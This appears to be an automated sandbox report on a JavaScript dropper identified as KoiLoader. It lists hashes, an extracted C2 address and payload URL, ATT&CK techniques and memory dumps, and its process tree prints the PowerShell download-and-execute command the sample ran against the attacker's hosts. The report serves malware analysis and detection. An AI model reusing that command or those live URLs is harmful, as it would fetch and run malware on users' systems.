Analysis

  • max time kernel
    94s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-06-2024 14:07

General

  • Target

    9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js

  • Size

    1KB

  • MD5

    e2e9bf7a7dcfe1d55a43229add47520b

  • SHA1

    f668de5e1e1090b831a6e8d8f08a9107234ab77f

  • SHA256

    9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c

  • SHA512

    97eee0d2c2c71e53418323511599dc4a94f82633dff83b153a271eaa24b918a6c53544b20f51d3de4b2c5a4f0b442eb1edbb2706c9591463c1982f44e580deec

Malware Config

Extracted

Family

koiloader

C2

http://81.19.141.115/marasmus.php

Attributes
  • payload_url

    https://www.dsestimation.com/wp-content/uploads/2015/10

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

  • Detects KoiLoader payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:628
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7zNMB3GWTLNX'; IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/piemagLI2X6.ps1'); $vv.SetValue($null, $true); IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/noncontrabandsVB1.ps1')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4776

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

2
T1059

PowerShell

1
T1059.001

JavaScript

1
T1059.007

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ob4hzkgq.lbt.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4776-17-0x0000000006250000-0x00000000065A4000-memory.dmp
    Filesize

    3.3MB

  • memory/4776-2-0x0000000005150000-0x0000000005186000-memory.dmp
    Filesize

    216KB

  • memory/4776-4-0x0000000005940000-0x0000000005F68000-memory.dmp
    Filesize

    6.2MB

  • memory/4776-6-0x0000000006070000-0x00000000060D6000-memory.dmp
    Filesize

    408KB

  • memory/4776-18-0x0000000006720000-0x000000000673E000-memory.dmp
    Filesize

    120KB

  • memory/4776-7-0x00000000060E0000-0x0000000006146000-memory.dmp
    Filesize

    408KB

  • memory/4776-3-0x00000000748D0000-0x0000000075080000-memory.dmp
    Filesize

    7.7MB

  • memory/4776-1-0x00000000748DE000-0x00000000748DF000-memory.dmp
    Filesize

    4KB

  • memory/4776-5-0x0000000005850000-0x0000000005872000-memory.dmp
    Filesize

    136KB

  • memory/4776-19-0x0000000006750000-0x000000000679C000-memory.dmp
    Filesize

    304KB

  • memory/4776-20-0x0000000007E40000-0x00000000084BA000-memory.dmp
    Filesize

    6.5MB

  • memory/4776-21-0x0000000006C40000-0x0000000006C5A000-memory.dmp
    Filesize

    104KB

  • memory/4776-22-0x00000000748D0000-0x0000000075080000-memory.dmp
    Filesize

    7.7MB

  • memory/4776-24-0x0000000007D90000-0x0000000007D9D000-memory.dmp
    Filesize

    52KB

  • memory/4776-30-0x00000000748D0000-0x0000000075080000-memory.dmp
    Filesize

    7.7MB

  • memory/4776-23-0x0000000007D70000-0x0000000007D71000-memory.dmp
    Filesize

    4KB